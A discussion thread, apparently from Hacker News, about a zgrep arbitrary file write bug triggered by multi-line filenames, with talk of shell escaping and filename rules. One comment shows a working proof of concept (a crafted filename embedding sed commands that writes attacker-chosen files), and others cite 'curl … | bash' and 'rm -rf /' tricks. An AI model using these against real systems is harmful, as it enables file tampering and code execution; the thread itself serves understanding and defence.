Arbitrary file write vulnerability in GNU gzip's zgrep utility

TheDong · on April 18, 2022

The commit fixing this bug is here: https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740...

while grep is written in C, zgrep is written in posix sh, and the bug was from using sed to escape arguments, and sed being a line-oriented utility that is non-ideal for operating on newline-containing strings (i.e. linux filenames).

foota · on April 18, 2022

The thought of writing anything in sh is horrifying to me.

djbusby · on April 18, 2022

Check out GNU pass

It's like all sh

0xdeadb00f · on April 19, 2022

I didn't know pass was "GNU". I also recall it being pretty well written.

guns · on April 19, 2022

Original author of password-store was Jason Donenfeld (of Wireguard fame), and it was indeed well-written.

0xdeadb00f · on April 19, 2022

Yes! Actually I remember now being surprised to find out Jason had written it. His git repository is full of neat and interesting projects.

loudmax · on April 19, 2022

Pass is a wrapper script around git and gpg. You can get the functionality of `pass` by running git and gpg commands directly.

Learning git itself is non-intuitive, but the gpg utilities take the learning curve to a whole other level. If you want to make simple use of the gpg utilities, you should plan on setting aside a few full days to learn how they work. Or just use pass, which additionally leverages git for password history.

scbrg · on April 19, 2022

bash, actually.

nikonyrh · on April 18, 2022

This reminds me that filenames can contain newlines.

10000truths · on April 19, 2022

They can contain any octet except ASCII NUL and /.

That said, pretty much every filesystem's on-disk format has an explicit length field for file names. So in theory, there's nothing stopping them from supporting completely binary filenames - it's the kernel's VFS layer that treats NUL and / as special.

tomrod · on April 19, 2022

guipsp · on April 19, 2022

And nulls :)

hddqsb · on April 19, 2022

How exactly can they contain nulls?

fopen() takes a null-terminated filename, so if there is a null byte in the middle it would just truncate the filename.

minusf · on April 19, 2022

that might be a corrupt filename that can be opened only by its inode in debugfs or similar.

teddyh · on April 19, 2022

No they can’t.

bee_rider · on April 18, 2022

Well, this seems like the sort of error that we've all made when throwing together our own personal scripts, so I guess it is somewhat heartening that the serious Redhat folks would make it too.

formerly_proven · on April 19, 2022

It always seemed very strange to me that there is no way to generate escaped representations in sh/bash, because you do need that from time to time.

phh · on April 19, 2022

There is printf %q, a bashism I think

Sample usage to escape var called v v="$(printf '%q' "$v")"

unqueued · on April 19, 2022

This is called ANSI-C quoting[1], and I am surprised it is not more popular, because I think it provides a good compromise with readability and power.

I used it myself when I wrote a script that generates a self executing bash script to restore mtimes for directories[2]

[1]: https://www.gnu.org/software/bash/manual/bash.html#ANSI_002d...

[2]: https://github.com/unqueued/storetouch

formerly_proven · on April 19, 2022

Thanks!

timdoug · on April 18, 2022

This one's pretty cool, example below per gzip-1.12/tests/zgrep-abuse:

  timdoug@box:~/gzip$ ls
  timdoug@box:~/gzip$ touch z
  timdoug@box:~/gzip$ echo test | gzip > 'z|
  p
  1s|.*|chosen-content|
  1w hacked
  etouch .\x2fhacked2
  d
  #
  #'
  timdoug@box:~/gzip$ zgrep test z*
  ztest
  timdoug@box:~/gzip$ ls hack*
  hacked  hacked2
  timdoug@box:~/gzip$ cat hacked
  chosen-content
  timdoug@box:~/gzip$

Beltiras · on April 19, 2022

Thanks for this! Simple enough to type out even.

xarope · on April 18, 2022

My epiphany was using find | xargs and realizing I need -print0 for the former and -0 for the latter to handle special characters. Then I realized all my previous bash scripts were WRONG...

aaaaaaaaaaab · on April 19, 2022

Zero-delimited versions of common bash tools/idioms:

  xargs -0

  find ... -print0

  sort -z

  while IFS= read -r -d '' var; do ...; done

  env -0

  printf -- '%s\0' *

nieve · on April 19, 2022

Don't you mean ascii null, not zero?

kevin_thibedeau · on April 19, 2022

Don't you mean NUL, not null?

jonathannerat · on April 19, 2022

Is there any real use case of having filenames with newlines? Everytime I recall that we have to design programs around that I wonder why it's possible in the first place.

kortex · on April 19, 2022

The only invalid character in a path is \0 (which of course would terminate the string immediately), and a particular filename cannot contain /, or be "." or "..". Doesn't even have to be unicode. Literally any other bytes.

dataflow · on April 19, 2022

Linux even allows filenames with end-of-transmission characters in them, which is a choice I'd question long before I start questioning newlines!

gpvos · on April 19, 2022

EOT or ctrl-D only has significance when typed into a tty. Once it has turned into a character it is as harmless as any other byte value, it doesn't end anything by itself.

moring · on April 19, 2022

Doesn't the article show that newline isn't harmless at all?

Of course EOT doesn't end anything by itself, nor does 0x0a end a line by itself -- all that happens through code that interprets those characters in a particular way, so talking about the "danger" of a character in absence of any code that operates on it is meaningless. In the presence of code, on the other hand, "harmless" in the extreme sense means "there exists no code that will act up when presented this character", which the article shows to be wrong.

dataflow · on April 19, 2022

I'm aware, but it nevertheless doesn't make any sense to have it in a file name.

gpvos · on April 19, 2022

I'm just saying that it makes exactly as much sense as ctrl-E or any other control char, it has no special status.

dataflow · on April 19, 2022

There are quite a few ASCII control characters [1] that could make more sense than EOT, e.g., \t, \n, \e, etc.

But yes, EOT is not the only nonsensical character that you could put in a file name, and I never claimed such.

[1] https://en.wikipedia.org/wiki/Control_character#In_ASCII

unqueued · on April 19, 2022

I think it is good that it is so flexible, because you never know what kind of data you may want represented on your filesystem. I would rather that there be as few restrictions as possible.

There are cases where you will encounter lots of nasty filenames, especially if you are handling user generated content, like scraping from YouTube or Instagram.

nightfly · on April 19, 2022

Makes things like UTF8 and other new encodings easier. Everything has to support that nearly anything can be in a filename

Thorrez · on April 19, 2022

It doesn't directly help UTF8, since all the bytes it uses for encoding non-ASCII have the high bit set.

It might directly help with UTF16, I'm not sure.

But the general idea of "block only a few specific characters (\0 and /) and allow all the rest" does help with UTF8. If the designers said something like "only ASCII letters and number and dashes and underscores" then that would block UTF8, and we might end up with something like URL hostnames, where you use punycode to encode non-ASCII into ASCII.

gpderetta · on April 19, 2022

The point is that unix behaviour is to treat filenames as byte strings, so no particular encoding is mandated by the kernel or by most tools. That made the transition to utf-8 fairly painless.

lupire · on April 19, 2022

So it's easier to write insecure software. Wrong priorities.

ElectricalUnion · on April 19, 2022

> easier to write insecure software.

Not filtering untrusted inputs, and not escaping or handling them correctly is how you write insecure software. Arbitrary input guarantees (unless very strict, then that's indirectly filtering inputs anyways) don't change that.

Thorrez · on April 20, 2022

Why does that make it easier to write insecure software? Which is easier: dealing with bytes, only 2 of which have special meanings (/ and \0) or dealing with a ton of different character classes, each of which you have to think about and code for. The second case happened with URLs, so there's all sorts of weird rules about you can have a ? in this section but not that section, and percent encoding and punycode and stuff like that.

develatio · on April 18, 2022

A very odd coincidence that just a few hours ago there was another news about a 0day in another de/compressor: https://news.ycombinator.com/item?id=31070256

motohagiography · on April 19, 2022

Rarely am I a commenter of so few words but, here be dragons.

mikece · on April 18, 2022

"This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names."

Perhaps I don't get this because I have used Windows most of my life (and DOS before that) but is it valid to have newline characters in a Unix/Linux filename?

i80and · on April 18, 2022

Unix filesystems can typically have filenames containing any bytes except "\0" and "/".

I believe you can also have newline characters in NTFS, although Windows Explorer appears to prevent creating a file with them.

mcculley · on April 18, 2022

I have been using the filename "meeting-notes:10/1 \n Unix & Windows.txt" to test various apps. It tends to expose just how brittle modern computing still is.

benibela · on April 18, 2022

I made a whole collection: https://github.com/benibela/nasty-files

asddubs · on April 18, 2022

"--no-preserve-root" made me laugh. for testing unescaped calls to rm?

jamal-kumar · on April 19, 2022

It's a bypass against a mitigation for an old trick which worked back in the day where you could watch someone self-nuke themselves off of IRC by convincing them to type rm -rf /

benibela · on April 19, 2022

It is to mess with people calling rm * / in the directory

Good thing there is not really any reason to call rm like that

asddubs · on April 20, 2022

oh does that actually work? the * expanding a filename to an argument? I guess it all just ends up in argv

unqueued · on April 19, 2022

Oh cool! I use nasty-files as a submodule with some of my tests. I can't believe how long I went without without testing against the filename corner cases.

I've found so much software that doesn't properly handle nasty filenames, I think it should be tested for more.

PokestarFan · on April 21, 2022

Lol that broke git for me

jeffbee · on April 18, 2022

There are no rules about what can be in a filename except they can't contain \0 or / as a matter of practice because the kernel interprets these as end of string and path element separator, respectively.

johncolanduoni · on April 19, 2022

For even more fun NTFS filenames can actually have newlines in them if you access them with \\?\.

jaclaz · on April 19, 2022

Good to know. :)

Another "queer" naming issue in Windows (JFYI), backslash and ALT+0160:

https://msfn.org/board/topic/131103-win_nt~bt-can-be-omitted...

pixl97 · on April 18, 2022

https://superuser.com/questions/129519/which-file-systems-su...

So yea, it looks like that linux filesystems accept this, but a lot of utilities break.

staunch · on April 18, 2022

This doesn't even seem like a legitimate security vulnerability at all, just a generic behavior bug. I'm guessing there are countless bugs like this in a common Linux userland.

I'd argue that the security vulnerability only exist in any program which passes untrusted user input to zgrep, which would be an obviously insecure thing to do.

Unless zgrep claims its safe against untrusted user input? But that would be weird and surprising.

TheDong · on April 18, 2022

16 years ago, there was a bug reported to zgrep where files with 1 newline caused it to behave incorrectly. It was patched without a CVE https://git.savannah.gnu.org/cgit/gzip.git/commit/zgrep.in?i...

This year, there was a bug reported to zgrep where files with 2 newlines caused it to behave incorrectly. It got a CVE and a front page hacker news post.

I give it very good odds this vulnerability has seen next to zero exploitation in the wild in either of the two cases above.

bombcar · on April 19, 2022

So we’re 16 years out from the three new line bug.

_Algernon_ · on April 19, 2022

https://xkcd.com/605/

josephcsible · on April 18, 2022

When is this actually exploitable? Are there any common programs or setups that result in zgrep getting called on attacker-provided filenames?

TheDong · on April 18, 2022

The exploit would have to be a bit contrived.

There aren't, to my knowledge, common programs or setups that would cause this to matter.

This would probably be used for social engineering at best, where the attacker convinces a victim to "hey, git clone my repo, and then run zgrep "bad string" * for some contrived reason"

Someone who's trying to assist someone else on discord or whatever probably won't consider running "zgrep" in an attacker controlled directory dangerous, so they might do it, while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.

oefrha · on April 19, 2022

> while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.

You’d be surprised. I wrote a Postfix tutorial ages ago and left my real email address in the To: of an example test email. I subsequently got a lot of emails from root@s with the exact same title and body over the years. Too many people copy paste anything labeled as instruction without a second thought.

AnotherGoodName · on April 18, 2022

The thing i don't get is the statement "Attack Vector Network" in the advisory as well at the statement it allows a remote attacker to write files.

I don't understand the bar to be called a Network Attack Vector. Surely there's more to this than asking the user to run shell commands right?

cjbprime · on April 19, 2022

It sounds like if a web service allowed a user to upload a file with attacker-chosen filename, which it will then run zgrep on, it would be vulnerable.

Perhaps that's why?

Beltiras · on April 19, 2022

That's actually the suggested installation mechanism for a lot of software. Most recent I can think of were some AWS cli tools, as delivered from AWS. Height of irresponsibility imo.

hsbauauvhabzb · on April 18, 2022

Given infinite code, yes. I would imagine exploitability would be rare, but that it’s easier to fix the vulnerability and move on rather than care about whether or not things are affected.

mc4ndr3 · on April 18, 2022

Why does a search tool even need to open a writable file handle?

opencl · on April 18, 2022

It's for searching inside of compressed files, and does this by decompressing to a temporary directory.

deathanatos · on April 18, 2022

… that is also shocking… it wouldn't just stream the decompression, perhaps piping the decompressed stream into grep itself?

TheDong · on April 18, 2022

zgrep does stream directly from gzip into grep.

You can see that here: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

It's also mentioned in one of the few comments in zgrep: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

> we use stdin to pass the gzip output to grep

zgrep does create a temporary directory to store the grep search pattern, but only if the pattern is passed via `zgrep -f`, and only if the pattern passed in is not a regular file (i.e. `zgrep -f <(echo "foo") some_file.gz` would create a temporary file with the contents "foo", not with the contents of some_file.gz, and `zgrep -f pattern_file search_file.gz` would not create any temporary file)

belltaco · on April 18, 2022

pixl97 · on April 18, 2022

I'm sure there's a lot of linux closed source utilities that will break in the same or worse manners. The problem will never be found there.

The issue with finding flaws in source is it takes a massive amount of logical thought about what inputs are possible. For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.

scottlamb · on April 18, 2022

> For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.

Likewise. I wonder if SELinux or AppArmor or the like allows setting a policy for valid filenames to create. E.g. no newlines, only valid UTF-8, only printable characters.

zeroimpl · on April 18, 2022

I’d like to see a flag somewhere to enable this. Perhaps it is a filesystem flag, similar to case-sensitivity.

eichin · on April 18, 2022

I've seen them (specifically, filenames generated from values in a "modern" configuration language - json or yaml - that mistakenly had newlines in them.) Fortunately, most of the shell tools involved used `-print0` and the related options anyway (because once you have humans involved, it's the easy way to handle normal spaces in names) and the things that did break, where only "some low-value data processing got skipped" rather than anything harmful.